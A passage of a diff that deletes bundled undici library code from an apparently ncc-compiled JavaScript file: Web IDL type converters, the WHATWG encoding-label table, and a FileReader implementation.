createDeferredPromise, - ReadableStreamFrom, - toUSVString, - tryUpgradeRequestToAPotentiallyTrustworthyURL, - coarsenedSharedCurrentTime, - determineRequestsReferrer, - makePolicyContainer, - clonePolicyContainer, - appendFetchMetadata, - appendRequestOriginHeader, - TAOCheck, - corsCheck, - crossOriginResourcePolicyCheck, - createOpaqueTimingInfo, - setRequestReferrerPolicyOnRedirect, - isValidHTTPToken, - requestBadPort, - requestCurrentURL, - responseURL, - responseLocationURL, - isBlobLike, - isURLPotentiallyTrustworthy, - isValidReasonPhrase, - sameOrigin, - normalizeMethod, - serializeJavascriptValueToJSONString, - makeIterator, - isValidHeaderName, - isValidHeaderValue, - hasOwn, - isErrorLike, - fullyReadBody, - bytesMatch, - isReadableStreamLike, - readableStreamClose, - isomorphicEncode, - isomorphicDecode, - urlIsLocal, - urlHasHttpsScheme, - urlIsHttpHttpsScheme, - readAllBytes, - normalizeMethodRecord -} - - -/***/ }), - -/***/ 1744: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { types } = __nccwpck_require__(3837) -const { hasOwn, toUSVString } = __nccwpck_require__(2538) - -/** @type {import('../../types/webidl').Webidl} */ -const webidl = {} -webidl.converters = {} -webidl.util = {} -webidl.errors = {} - -webidl.errors.exception = function (message) { - return new TypeError(`${message.header}: ${message.message}`) -} - -webidl.errors.conversionFailed = function (context) { - const plural = context.types.length === 1 ? '' : ' one of' - const message = - `${context.argument} could not be converted to` + - `${plural}: ${context.types.join(', ')}.` - - return webidl.errors.exception({ - header: context.prefix, - message - }) -} - -webidl.errors.invalidArgument = function (context) { - return webidl.errors.exception({ - header: context.prefix, - message: `"${context.value}" is an invalid ${context.type}.` - }) -} - -// https://webidl.spec.whatwg.org/#implements -webidl.brandCheck = function (V, I, opts = undefined) { - if (opts?.strict !== false && !(V instanceof I)) { - throw new TypeError('Illegal invocation') - } else { - return V?.[Symbol.toStringTag] === I.prototype[Symbol.toStringTag] - } -} - -webidl.argumentLengthCheck = function ({ length }, min, ctx) { - if (length < min) { - throw webidl.errors.exception({ - message: `${min} argument${min !== 1 ? 's' : ''} required, ` + - `but${length ? ' only' : ''} ${length} found.`, - ...ctx - }) - } -} - -webidl.illegalConstructor = function () { - throw webidl.errors.exception({ - header: 'TypeError', - message: 'Illegal constructor' - }) -} - -// https://tc39.es/ecma262/#sec-ecmascript-data-types-and-values -webidl.util.Type = function (V) { - switch (typeof V) { - case 'undefined': return 'Undefined' - case 'boolean': return 'Boolean' - case 'string': return 'String' - case 'symbol': return 'Symbol' - case 'number': return 'Number' - case 'bigint': return 'BigInt' - case 'function': - case 'object': { - if (V === null) { - return 'Null' - } - - return 'Object' - } - } -} - -// https://webidl.spec.whatwg.org/#abstract-opdef-converttoint -webidl.util.ConvertToInt = function (V, bitLength, signedness, opts = {}) { - let upperBound - let lowerBound - - // 1. If bitLength is 64, then: - if (bitLength === 64) { - // 1. Let upperBound be 2^53 − 1. - upperBound = Math.pow(2, 53) - 1 - - // 2. If signedness is "unsigned", then let lowerBound be 0. - if (signedness === 'unsigned') { - lowerBound = 0 - } else { - // 3. Otherwise let lowerBound be −2^53 + 1. - lowerBound = Math.pow(-2, 53) + 1 - } - } else if (signedness === 'unsigned') { - // 2. Otherwise, if signedness is "unsigned", then: - - // 1. Let lowerBound be 0. - lowerBound = 0 - - // 2. Let upperBound be 2^bitLength − 1. - upperBound = Math.pow(2, bitLength) - 1 - } else { - // 3. Otherwise: - - // 1. Let lowerBound be -2^bitLength − 1. - lowerBound = Math.pow(-2, bitLength) - 1 - - // 2. Let upperBound be 2^bitLength − 1 − 1. - upperBound = Math.pow(2, bitLength - 1) - 1 - } - - // 4. Let x be ? ToNumber(V). - let x = Number(V) - - // 5. If x is −0, then set x to +0. - if (x === 0) { - x = 0 - } - - // 6. If the conversion is to an IDL type associated - // with the [EnforceRange] extended attribute, then: - if (opts.enforceRange === true) { - // 1. If x is NaN, +∞, or −∞, then throw a TypeError. - if ( - Number.isNaN(x) || - x === Number.POSITIVE_INFINITY || - x === Number.NEGATIVE_INFINITY - ) { - throw webidl.errors.exception({ - header: 'Integer conversion', - message: `Could not convert ${V} to an integer.` - }) - } - - // 2. Set x to IntegerPart(x). - x = webidl.util.IntegerPart(x) - - // 3. If x < lowerBound or x > upperBound, then - // throw a TypeError. - if (x < lowerBound || x > upperBound) { - throw webidl.errors.exception({ - header: 'Integer conversion', - message: `Value must be between ${lowerBound}-${upperBound}, got ${x}.` - }) - } - - // 4. Return x. - return x - } - - // 7. If x is not NaN and the conversion is to an IDL - // type associated with the [Clamp] extended - // attribute, then: - if (!Number.isNaN(x) && opts.clamp === true) { - // 1. Set x to min(max(x, lowerBound), upperBound). - x = Math.min(Math.max(x, lowerBound), upperBound) - - // 2. Round x to the nearest integer, choosing the - // even integer if it lies halfway between two, - // and choosing +0 rather than −0. - if (Math.floor(x) % 2 === 0) { - x = Math.floor(x) - } else { - x = Math.ceil(x) - } - - // 3. Return x. - return x - } - - // 8. If x is NaN, +0, +∞, or −∞, then return +0. - if ( - Number.isNaN(x) || - (x === 0 && Object.is(0, x)) || - x === Number.POSITIVE_INFINITY || - x === Number.NEGATIVE_INFINITY - ) { - return 0 - } - - // 9. Set x to IntegerPart(x). - x = webidl.util.IntegerPart(x) - - // 10. Set x to x modulo 2^bitLength. - x = x % Math.pow(2, bitLength) - - // 11. If signedness is "signed" and x ≥ 2^bitLength − 1, - // then return x − 2^bitLength. - if (signedness === 'signed' && x >= Math.pow(2, bitLength) - 1) { - return x - Math.pow(2, bitLength) - } - - // 12. Otherwise, return x. - return x -} - -// https://webidl.spec.whatwg.org/#abstract-opdef-integerpart -webidl.util.IntegerPart = function (n) { - // 1. Let r be floor(abs(n)). - const r = Math.floor(Math.abs(n)) - - // 2. If n < 0, then return -1 × r. - if (n < 0) { - return -1 * r - } - - // 3. Otherwise, return r. - return r -} - -// https://webidl.spec.whatwg.org/#es-sequence -webidl.sequenceConverter = function (converter) { - return (V) => { - // 1. If Type(V) is not Object, throw a TypeError. - if (webidl.util.Type(V) !== 'Object') { - throw webidl.errors.exception({ - header: 'Sequence', - message: `Value of type ${webidl.util.Type(V)} is not an Object.` - }) - } - - // 2. Let method be ? GetMethod(V, @@iterator). - /** @type {Generator} */ - const method = V?.[Symbol.iterator]?.() - const seq = [] - - // 3. If method is undefined, throw a TypeError. - if ( - method === undefined || - typeof method.next !== 'function' - ) { - throw webidl.errors.exception({ - header: 'Sequence', - message: 'Object is not an iterator.' - }) - } - - // https://webidl.spec.whatwg.org/#create-sequence-from-iterable - while (true) { - const { done, value } = method.next() - - if (done) { - break - } - - seq.push(converter(value)) - } - - return seq - } -} - -// https://webidl.spec.whatwg.org/#es-to-record -webidl.recordConverter = function (keyConverter, valueConverter) { - return (O) => { - // 1. If Type(O) is not Object, throw a TypeError. - if (webidl.util.Type(O) !== 'Object') { - throw webidl.errors.exception({ - header: 'Record', - message: `Value of type ${webidl.util.Type(O)} is not an Object.` - }) - } - - // 2. Let result be a new empty instance of record. - const result = {} - - if (!types.isProxy(O)) { - // Object.keys only returns enumerable properties - const keys = Object.keys(O) - - for (const key of keys) { - // 1. Let typedKey be key converted to an IDL value of type K. - const typedKey = keyConverter(key) - - // 2. Let value be ? Get(O, key). - // 3. Let typedValue be value converted to an IDL value of type V. - const typedValue = valueConverter(O[key]) - - // 4. Set result[typedKey] to typedValue. - result[typedKey] = typedValue - } - - // 5. Return result. - return result - } - - // 3. Let keys be ? O.[[OwnPropertyKeys]](). - const keys = Reflect.ownKeys(O) - - // 4. For each key of keys. - for (const key of keys) { - // 1. Let desc be ? O.[[GetOwnProperty]](key). - const desc = Reflect.getOwnPropertyDescriptor(O, key) - - // 2. If desc is not undefined and desc.[[Enumerable]] is true: - if (desc?.enumerable) { - // 1. Let typedKey be key converted to an IDL value of type K. - const typedKey = keyConverter(key) - - // 2. Let value be ? Get(O, key). - // 3. Let typedValue be value converted to an IDL value of type V. - const typedValue = valueConverter(O[key]) - - // 4. Set result[typedKey] to typedValue. - result[typedKey] = typedValue - } - } - - // 5. Return result. - return result - } -} - -webidl.interfaceConverter = function (i) { - return (V, opts = {}) => { - if (opts.strict !== false && !(V instanceof i)) { - throw webidl.errors.exception({ - header: i.name, - message: `Expected ${V} to be an instance of ${i.name}.` - }) - } - - return V - } -} - -webidl.dictionaryConverter = function (converters) { - return (dictionary) => { - const type = webidl.util.Type(dictionary) - const dict = {} - - if (type === 'Null' || type === 'Undefined') { - return dict - } else if (type !== 'Object') { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `Expected ${dictionary} to be one of: Null, Undefined, Object.` - }) - } - - for (const options of converters) { - const { key, defaultValue, required, converter } = options - - if (required === true) { - if (!hasOwn(dictionary, key)) { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `Missing required key "${key}".` - }) - } - } - - let value = dictionary[key] - const hasDefault = hasOwn(options, 'defaultValue') - - // Only use defaultValue if value is undefined and - // a defaultValue options was provided. - if (hasDefault && value !== null) { - value = value ?? defaultValue - } - - // A key can be optional and have no default value. - // When this happens, do not perform a conversion, - // and do not assign the key a value. - if (required || hasDefault || value !== undefined) { - value = converter(value) - - if ( - options.allowedValues && - !options.allowedValues.includes(value) - ) { - throw webidl.errors.exception({ - header: 'Dictionary', - message: `${value} is not an accepted type. Expected one of ${options.allowedValues.join(', ')}.` - }) - } - - dict[key] = value - } - } - - return dict - } -} - -webidl.nullableConverter = function (converter) { - return (V) => { - if (V === null) { - return V - } - - return converter(V) - } -} - -// https://webidl.spec.whatwg.org/#es-DOMString -webidl.converters.DOMString = function (V, opts = {}) { - // 1. If V is null and the conversion is to an IDL type - // associated with the [LegacyNullToEmptyString] - // extended attribute, then return the DOMString value - // that represents the empty string. - if (V === null && opts.legacyNullToEmptyString) { - return '' - } - - // 2. Let x be ? ToString(V). - if (typeof V === 'symbol') { - throw new TypeError('Could not convert argument of type symbol to string.') - } - - // 3. Return the IDL DOMString value that represents the - // same sequence of code units as the one the - // ECMAScript String value x represents. - return String(V) -} - -// https://webidl.spec.whatwg.org/#es-ByteString -webidl.converters.ByteString = function (V) { - // 1. Let x be ? ToString(V). - // Note: DOMString converter perform ? ToString(V) - const x = webidl.converters.DOMString(V) - - // 2. If the value of any element of x is greater than - // 255, then throw a TypeError. - for (let index = 0; index < x.length; index++) { - if (x.charCodeAt(index) > 255) { - throw new TypeError( - 'Cannot convert argument to a ByteString because the character at ' + - `index ${index} has a value of ${x.charCodeAt(index)} which is greater than 255.` - ) - } - } - - // 3. Return an IDL ByteString value whose length is the - // length of x, and where the value of each element is - // the value of the corresponding element of x. - return x -} - -// https://webidl.spec.whatwg.org/#es-USVString -webidl.converters.USVString = toUSVString - -// https://webidl.spec.whatwg.org/#es-boolean -webidl.converters.boolean = function (V) { - // 1. Let x be the result of computing ToBoolean(V). - const x = Boolean(V) - - // 2. Return the IDL boolean value that is the one that represents - // the same truth value as the ECMAScript Boolean value x. - return x -} - -// https://webidl.spec.whatwg.org/#es-any -webidl.converters.any = function (V) { - return V -} - -// https://webidl.spec.whatwg.org/#es-long-long -webidl.converters['long long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 64, "signed"). - const x = webidl.util.ConvertToInt(V, 64, 'signed') - - // 2. Return the IDL long long value that represents - // the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-long-long -webidl.converters['unsigned long long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 64, "unsigned"). - const x = webidl.util.ConvertToInt(V, 64, 'unsigned') - - // 2. Return the IDL unsigned long long value that - // represents the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-long -webidl.converters['unsigned long'] = function (V) { - // 1. Let x be ? ConvertToInt(V, 32, "unsigned"). - const x = webidl.util.ConvertToInt(V, 32, 'unsigned') - - // 2. Return the IDL unsigned long value that - // represents the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#es-unsigned-short -webidl.converters['unsigned short'] = function (V, opts) { - // 1. Let x be ? ConvertToInt(V, 16, "unsigned"). - const x = webidl.util.ConvertToInt(V, 16, 'unsigned', opts) - - // 2. Return the IDL unsigned short value that represents - // the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#idl-ArrayBuffer -webidl.converters.ArrayBuffer = function (V, opts = {}) { - // 1. If Type(V) is not Object, or V does not have an - // [[ArrayBufferData]] internal slot, then throw a - // TypeError. - // see: https://tc39.es/ecma262/#sec-properties-of-the-arraybuffer-instances - // see: https://tc39.es/ecma262/#sec-properties-of-the-sharedarraybuffer-instances - if ( - webidl.util.Type(V) !== 'Object' || - !types.isAnyArrayBuffer(V) - ) { - throw webidl.errors.conversionFailed({ - prefix: `${V}`, - argument: `${V}`, - types: ['ArrayBuffer'] - }) - } - - // 2. If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V) is true, then throw a - // TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 3. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V) is true, then throw a - // TypeError. - // Note: resizable ArrayBuffers are currently a proposal. - - // 4. Return the IDL ArrayBuffer value that is a - // reference to the same object as V. - return V -} - -webidl.converters.TypedArray = function (V, T, opts = {}) { - // 1. Let T be the IDL type V is being converted to. - - // 2. If Type(V) is not Object, or V does not have a - // [[TypedArrayName]] internal slot with a value - // equal to T’s name, then throw a TypeError. - if ( - webidl.util.Type(V) !== 'Object' || - !types.isTypedArray(V) || - V.constructor.name !== T.name - ) { - throw webidl.errors.conversionFailed({ - prefix: `${T.name}`, - argument: `${V}`, - types: [T.name] - }) - } - - // 3. If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 4. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - // Note: resizable array buffers are currently a proposal - - // 5. Return the IDL value of type T that is a reference - // to the same object as V. - return V -} - -webidl.converters.DataView = function (V, opts = {}) { - // 1. If Type(V) is not Object, or V does not have a - // [[DataView]] internal slot, then throw a TypeError. - if (webidl.util.Type(V) !== 'Object' || !types.isDataView(V)) { - throw webidl.errors.exception({ - header: 'DataView', - message: 'Object is not a DataView.' - }) - } - - // 2. If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is true, - // then throw a TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 3. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - // Note: resizable ArrayBuffers are currently a proposal - - // 4. Return the IDL DataView value that is a reference - // to the same object as V. - return V -} - -// https://webidl.spec.whatwg.org/#BufferSource -webidl.converters.BufferSource = function (V, opts = {}) { - if (types.isAnyArrayBuffer(V)) { - return webidl.converters.ArrayBuffer(V, opts) - } - - if (types.isTypedArray(V)) { - return webidl.converters.TypedArray(V, V.constructor) - } - - if (types.isDataView(V)) { - return webidl.converters.DataView(V, opts) - } - - throw new TypeError(`Could not convert ${V} to a BufferSource.`) -} - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.ByteString -) - -webidl.converters['sequence>'] = webidl.sequenceConverter( - webidl.converters['sequence'] -) - -webidl.converters['record'] = webidl.recordConverter( - webidl.converters.ByteString, - webidl.converters.ByteString -) - -module.exports = { - webidl -} - - -/***/ }), - -/***/ 4854: -/***/ ((module) => { - -"use strict"; - - -/** - * @see https://encoding.spec.whatwg.org/#concept-encoding-get - * @param {string|undefined} label - */ -function getEncoding (label) { - if (!label) { - return 'failure' - } - - // 1. Remove any leading and trailing ASCII whitespace from label. - // 2. If label is an ASCII case-insensitive match for any of the - // labels listed in the table below, then return the - // corresponding encoding; otherwise return failure. - switch (label.trim().toLowerCase()) { - case 'unicode-1-1-utf-8': - case 'unicode11utf8': - case 'unicode20utf8': - case 'utf-8': - case 'utf8': - case 'x-unicode20utf8': - return 'UTF-8' - case '866': - case 'cp866': - case 'csibm866': - case 'ibm866': - return 'IBM866' - case 'csisolatin2': - case 'iso-8859-2': - case 'iso-ir-101': - case 'iso8859-2': - case 'iso88592': - case 'iso_8859-2': - case 'iso_8859-2:1987': - case 'l2': - case 'latin2': - return 'ISO-8859-2' - case 'csisolatin3': - case 'iso-8859-3': - case 'iso-ir-109': - case 'iso8859-3': - case 'iso88593': - case 'iso_8859-3': - case 'iso_8859-3:1988': - case 'l3': - case 'latin3': - return 'ISO-8859-3' - case 'csisolatin4': - case 'iso-8859-4': - case 'iso-ir-110': - case 'iso8859-4': - case 'iso88594': - case 'iso_8859-4': - case 'iso_8859-4:1988': - case 'l4': - case 'latin4': - return 'ISO-8859-4' - case 'csisolatincyrillic': - case 'cyrillic': - case 'iso-8859-5': - case 'iso-ir-144': - case 'iso8859-5': - case 'iso88595': - case 'iso_8859-5': - case 'iso_8859-5:1988': - return 'ISO-8859-5' - case 'arabic': - case 'asmo-708': - case 'csiso88596e': - case 'csiso88596i': - case 'csisolatinarabic': - case 'ecma-114': - case 'iso-8859-6': - case 'iso-8859-6-e': - case 'iso-8859-6-i': - case 'iso-ir-127': - case 'iso8859-6': - case 'iso88596': - case 'iso_8859-6': - case 'iso_8859-6:1987': - return 'ISO-8859-6' - case 'csisolatingreek': - case 'ecma-118': - case 'elot_928': - case 'greek': - case 'greek8': - case 'iso-8859-7': - case 'iso-ir-126': - case 'iso8859-7': - case 'iso88597': - case 'iso_8859-7': - case 'iso_8859-7:1987': - case 'sun_eu_greek': - return 'ISO-8859-7' - case 'csiso88598e': - case 'csisolatinhebrew': - case 'hebrew': - case 'iso-8859-8': - case 'iso-8859-8-e': - case 'iso-ir-138': - case 'iso8859-8': - case 'iso88598': - case 'iso_8859-8': - case 'iso_8859-8:1988': - case 'visual': - return 'ISO-8859-8' - case 'csiso88598i': - case 'iso-8859-8-i': - case 'logical': - return 'ISO-8859-8-I' - case 'csisolatin6': - case 'iso-8859-10': - case 'iso-ir-157': - case 'iso8859-10': - case 'iso885910': - case 'l6': - case 'latin6': - return 'ISO-8859-10' - case 'iso-8859-13': - case 'iso8859-13': - case 'iso885913': - return 'ISO-8859-13' - case 'iso-8859-14': - case 'iso8859-14': - case 'iso885914': - return 'ISO-8859-14' - case 'csisolatin9': - case 'iso-8859-15': - case 'iso8859-15': - case 'iso885915': - case 'iso_8859-15': - case 'l9': - return 'ISO-8859-15' - case 'iso-8859-16': - return 'ISO-8859-16' - case 'cskoi8r': - case 'koi': - case 'koi8': - case 'koi8-r': - case 'koi8_r': - return 'KOI8-R' - case 'koi8-ru': - case 'koi8-u': - return 'KOI8-U' - case 'csmacintosh': - case 'mac': - case 'macintosh': - case 'x-mac-roman': - return 'macintosh' - case 'iso-8859-11': - case 'iso8859-11': - case 'iso885911': - case 'tis-620': - case 'windows-874': - return 'windows-874' - case 'cp1250': - case 'windows-1250': - case 'x-cp1250': - return 'windows-1250' - case 'cp1251': - case 'windows-1251': - case 'x-cp1251': - return 'windows-1251' - case 'ansi_x3.4-1968': - case 'ascii': - case 'cp1252': - case 'cp819': - case 'csisolatin1': - case 'ibm819': - case 'iso-8859-1': - case 'iso-ir-100': - case 'iso8859-1': - case 'iso88591': - case 'iso_8859-1': - case 'iso_8859-1:1987': - case 'l1': - case 'latin1': - case 'us-ascii': - case 'windows-1252': - case 'x-cp1252': - return 'windows-1252' - case 'cp1253': - case 'windows-1253': - case 'x-cp1253': - return 'windows-1253' - case 'cp1254': - case 'csisolatin5': - case 'iso-8859-9': - case 'iso-ir-148': - case 'iso8859-9': - case 'iso88599': - case 'iso_8859-9': - case 'iso_8859-9:1989': - case 'l5': - case 'latin5': - case 'windows-1254': - case 'x-cp1254': - return 'windows-1254' - case 'cp1255': - case 'windows-1255': - case 'x-cp1255': - return 'windows-1255' - case 'cp1256': - case 'windows-1256': - case 'x-cp1256': - return 'windows-1256' - case 'cp1257': - case 'windows-1257': - case 'x-cp1257': - return 'windows-1257' - case 'cp1258': - case 'windows-1258': - case 'x-cp1258': - return 'windows-1258' - case 'x-mac-cyrillic': - case 'x-mac-ukrainian': - return 'x-mac-cyrillic' - case 'chinese': - case 'csgb2312': - case 'csiso58gb231280': - case 'gb2312': - case 'gb_2312': - case 'gb_2312-80': - case 'gbk': - case 'iso-ir-58': - case 'x-gbk': - return 'GBK' - case 'gb18030': - return 'gb18030' - case 'big5': - case 'big5-hkscs': - case 'cn-big5': - case 'csbig5': - case 'x-x-big5': - return 'Big5' - case 'cseucpkdfmtjapanese': - case 'euc-jp': - case 'x-euc-jp': - return 'EUC-JP' - case 'csiso2022jp': - case 'iso-2022-jp': - return 'ISO-2022-JP' - case 'csshiftjis': - case 'ms932': - case 'ms_kanji': - case 'shift-jis': - case 'shift_jis': - case 'sjis': - case 'windows-31j': - case 'x-sjis': - return 'Shift_JIS' - case 'cseuckr': - case 'csksc56011987': - case 'euc-kr': - case 'iso-ir-149': - case 'korean': - case 'ks_c_5601-1987': - case 'ks_c_5601-1989': - case 'ksc5601': - case 'ksc_5601': - case 'windows-949': - return 'EUC-KR' - case 'csiso2022kr': - case 'hz-gb-2312': - case 'iso-2022-cn': - case 'iso-2022-cn-ext': - case 'iso-2022-kr': - case 'replacement': - return 'replacement' - case 'unicodefffe': - case 'utf-16be': - return 'UTF-16BE' - case 'csunicode': - case 'iso-10646-ucs-2': - case 'ucs-2': - case 'unicode': - case 'unicodefeff': - case 'utf-16': - case 'utf-16le': - return 'UTF-16LE' - case 'x-user-defined': - return 'x-user-defined' - default: return 'failure' - } -} - -module.exports = { - getEncoding -} - - -/***/ }), - -/***/ 1446: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - staticPropertyDescriptors, - readOperation, - fireAProgressEvent -} = __nccwpck_require__(7530) -const { - kState, - kError, - kResult, - kEvents, - kAborted -} = __nccwpck_require__(9054) -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) - -class FileReader extends EventTarget { - constructor () { - super() - - this[kState] = 'empty' - this[kResult] = null - this[kError] = null - this[kEvents] = { - loadend: null, - error: null, - abort: null, - load: null, - progress: null, - loadstart: null - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-readAsArrayBuffer - * @param {import('buffer').Blob} blob - */ - readAsArrayBuffer (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsArrayBuffer' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsArrayBuffer(blob) method, when invoked, - // must initiate a read operation for blob with ArrayBuffer. - readOperation(this, blob, 'ArrayBuffer') - } - - /** - * @see https://w3c.github.io/FileAPI/#readAsBinaryString - * @param {import('buffer').Blob} blob - */ - readAsBinaryString (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsBinaryString' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsBinaryString(blob) method, when invoked, - // must initiate a read operation for blob with BinaryString. - readOperation(this, blob, 'BinaryString') - } - - /** - * @see https://w3c.github.io/FileAPI/#readAsDataText - * @param {import('buffer').Blob} blob - * @param {string?} encoding - */ - readAsText (blob, encoding = undefined) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsText' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - if (encoding !== undefined) { - encoding = webidl.converters.DOMString(encoding) - } - - // The readAsText(blob, encoding) method, when invoked, - // must initiate a read operation for blob with Text and encoding. - readOperation(this, blob, 'Text', encoding) - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-readAsDataURL - * @param {import('buffer').Blob} blob - */ - readAsDataURL (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsDataURL' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsDataURL(blob) method, when invoked, must - // initiate a read operation for blob with DataURL. - readOperation(this, blob, 'DataURL') - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-abort - */ - abort () { - // 1. If this's state is "empty" or if this's state is - // "done" set this's result to null and terminate - // this algorithm. - if (this[kState] === 'empty' || this[kState] === 'done') { - this[kResult] = null - return - } - - // 2. If this's state is "loading" set this's state to - // "done" and set this's result to null. - if (this[kState] === 'loading') { - this[kState] = 'done' - this[kResult] = null - } - - // 3. If there are any tasks from this on the file reading - // task source in an affiliated task queue, then remove - // those tasks from that task queue. - this[kAborted] = true - - // 4. Terminate the algorithm for the read method being processed. - // TODO - - // 5. Fire a progress event called abort at this. - fireAProgressEvent('abort', this) - - // 6. If this's state is not "loading", fire a progress - // event called loadend at this. - if (this[kState] !== 'loading') { - fireAProgressEvent('loadend', this) - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-readystate - */ - get readyState () { - webidl.brandCheck(this, FileReader) - - switch (this[kState]) { - case 'empty': return this.EMPTY - case 'loading': return this.LOADING - case 'done': return this.DONE - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-result - */ - get result () { - webidl.brandCheck(this, FileReader) - - // The result attribute’s getter, when invoked, must return - // this's result. - return this[kResult] - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-error - */ - get error () { - webidl.brandCheck(this, FileReader) - - // The error attribute’s getter, when invoked, must return - // this's error. - return this[kError] - } - - get onloadend () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].loadend - } - - set onloadend (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].loadend) { - this.removeEventListener('loadend', this[kEvents].loadend) - } - - if (typeof fn === 'function') { - this[kEvents].loadend = fn - this.addEventListener('loadend', fn) - } else { - this[kEvents].loadend = null - } - } - - get onerror () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].error - } - - set onerror (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].error) { - this.removeEventListener('error', this[kEvents].error) - } - - if (typeof fn === 'function') { - this[kEvents].error = fn - this.addEventListener('error', fn) - } else { - this[kEvents].error = null - } - } - - get onloadstart () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].loadstart - } - - set onloadstart (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].loadstart) { - this.removeEventListener('loadstart', this[kEvents].loadstart) - } - - if (typeof fn === 'function') { - this[kEvents].loadstart = fn - this.addEventListener('loadstart', fn) - } else { - this[kEvents].loadstart = null - } - } - - get onprogress () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].progress - } - - set onprogress (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].progress) { - this.removeEventListener('progress', this[kEvents].progress) - } - - if (typeof fn === 'function') { - this[kEvents].progress = fn - this.addEventListener('progress', fn) - } else { - this[kEvents].progress = null - } - } - - get onload () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].load - } - - set onload (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].load) { - this.removeEventListener('load', this[kEvents].load) - } - - if (typeof fn === 'function') { - this[kEvents].load = fn - this.addEventListener('load', fn) - } else { - this[kEvents].load = null - } - } - - get onabort () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].abort - } - - set onabort (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].abort) { - this.removeEventListener('abort', this[kEvents].abort) - } - - if (typeof fn === 'function') { - this[kEvents].abort = fn - this.addEventListener('abort', fn) - } else { - this[kEvents].abort = null - } - } -} - -// https://w3c.github.io/FileAPI/#dom-filereader-empty -FileReader.EMPTY = FileReader.prototype.EMPTY = 0 -// https://w3c.github.io/FileAPI/#dom-filereader-loading -FileReader.LOADING = FileReader.prototype.LOADING = 1 -// https://w3c.github.io/FileAPI/#dom-filereader-done -FileReader.DONE = FileReader.prototype.DONE = 2 - -Object.defineProperties(FileReader.prototype, { - EMPTY: staticPropertyDescriptors, - LOADING: staticPropertyDescriptors, - DONE: staticPropertyDescriptors, - readAsArrayBuffer: kEnumerableProperty, - readAsBinaryString: kEnumerableProperty, - readAsText: kEnumerableProperty, - readAsDataURL: kEnumerableProperty, - abort: kEnumerableProperty, - readyState: kEnumerableProperty, - result: kEnumerableProperty, - error: kEnumerableProperty, - onloadstart: kEnumerableProperty, - onprogress: kEnumerableProperty, - onload: kEnumerableProperty, - onabort: kEnumerableProperty, - onerror: kEnumerableProperty, - onloadend: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'FileReader', - writable: false, - enumerable: false, - configurable: true - } -}) - -Object.defineProperties(FileReader, { - EMPTY: staticPropertyDescriptors, - LOADING: staticPropertyDescriptors, - DONE: staticPropertyDescriptors -}) - -module.exports = { - FileReader -} - - -/***/ }), - -/***/ 5504: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) - -const kState = Symbol('ProgressEvent state') - -/** - * @see https://xhr.spec.whatwg.org/#progressevent - */ -class ProgressEvent extends Event { - constructor (type, eventInitDict = {}) { - type = 